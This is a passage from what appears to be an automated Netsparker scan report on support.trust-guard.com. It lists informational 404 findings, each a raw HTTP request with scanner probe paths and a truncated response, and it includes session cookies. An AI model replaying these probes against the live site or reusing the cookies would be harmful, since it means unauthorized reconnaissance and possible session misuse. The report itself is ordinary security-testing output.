Referer: https://support.trust-guard.com/visitor//%22javascript:doProactiveRequest_vvx8pjmw();/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:37 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.85. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22javascript:startChat_vvx8pjmw(/

Request

GET /visitor/%22javascript:startChat_vvx8pjmw(/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22javascript:startChat_vvx8pjmw(/'0/');/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:04:46 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.86. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/'0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22javascript:startChat_vvx8pjmw(/'0/

Request

GET /visitor/%22javascript:startChat_vvx8pjmw(/'0/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22javascript:startChat_vvx8pjmw(/'0/');/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:04:28 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.87. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/'0/')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22javascript:startChat_vvx8pjmw(/'0/')

Request

GET /visitor/%22javascript:startChat_vvx8pjmw(/'0/');/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22javascript:startChat_vvx8pjmw(/'0/');/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:04:27 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.88. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/'0/Netsparker73b16356e987466e8d845e618d4ea653/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22javascript:startChat_vvx8pjmw(/'0/Netsparker73b16356e987466e8d845e618d4ea653/

Request

GET /visitor/%22javascript:startChat_vvx8pjmw(/'0/Netsparker73b16356e987466e8d845e618d4ea653/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:04:39 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.89. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/Netsparker8e177151a0de4476b38092314bfa83e9/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22javascript:startChat_vvx8pjmw(/Netsparker8e177151a0de4476b38092314bfa83e9/

Request

GET /visitor/%22javascript:startChat_vvx8pjmw(/Netsparker8e177151a0de4476b38092314bfa83e9/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:04:50 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.90. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/space.gif/%22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor//%22https://support.trust-guard.com/themes/client_default/space.gif/%22

Request

GET /visitor//%22https://support.trust-guard.com/themes/client_default/space.gif/%22 HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:59 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2300
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.91. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/space.gif/Netsparker298a189fb87f4b4fba8bba2fe8ae1624  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor//%22https://support.trust-guard.com/themes/client_default/space.gif/Netsparker298a189fb87f4b4fba8bba2fe8ae1624

Request

GET /visitor//%22https://support.trust-guard.com/themes/client_default/space.gif/Netsparker298a189fb87f4b4fba8bba2fe8ae1624 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:06:08 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2300
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.92. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor//%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22

Request

GET /visitor//%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22 HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:06:18 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2300
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.93. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker3c09a1f8515d4357b7bd1f33feed612f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor//%22https://support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker3c09a1f8515d4357b7bd1f33feed612f

Request

GET /visitor//%22https://support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker3c09a1f8515d4357b7bd1f33feed612f HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:06:28 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2300
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.94. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22

Request

GET /visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22 HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:26 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2300
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.95. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparker9160a77a82504db19dfb5fff18d96e07  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparker9160a77a82504db19dfb5fff18d96e07

Request

GET /visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparker9160a77a82504db19dfb5fff18d96e07 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:47 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2300
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.96. https://support.trust-guard.com/visitor//%22javascript:closeProactiveRequest_vvx8pjmw()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor//%22javascript:closeProactiveRequest_vvx8pjmw()

Request

GET /visitor//%22javascript:closeProactiveRequest_vvx8pjmw();/%22 HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:56 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2300
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.97. https://support.trust-guard.com/visitor//%22javascript:doProactiveRequest_vvx8pjmw()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor//%22javascript:doProactiveRequest_vvx8pjmw()

Request

GET /visitor//%22javascript:doProactiveRequest_vvx8pjmw();/%22 HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:40 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2300
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.98. https://support.trust-guard.com/visitor//%22javascript:startChat_vvx8pjmw(/'0/')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor//%22javascript:startChat_vvx8pjmw(/'0/')

Request

GET /visitor//%22javascript:startChat_vvx8pjmw(/'0/');/%22 HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:04:46 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2300
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.99. https://support.trust-guard.com/visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php

Request

GET /visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:15 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
33.100. https://support.trust-guard.com/visitor/Netsparkerfb734a5866dc47289c8dd804175b8b26/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/Netsparkerfb734a5866dc47289c8dd804175b8b26/

Request

GET /visitor/Netsparkerfb734a5866dc47289c8dd804175b8b26/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
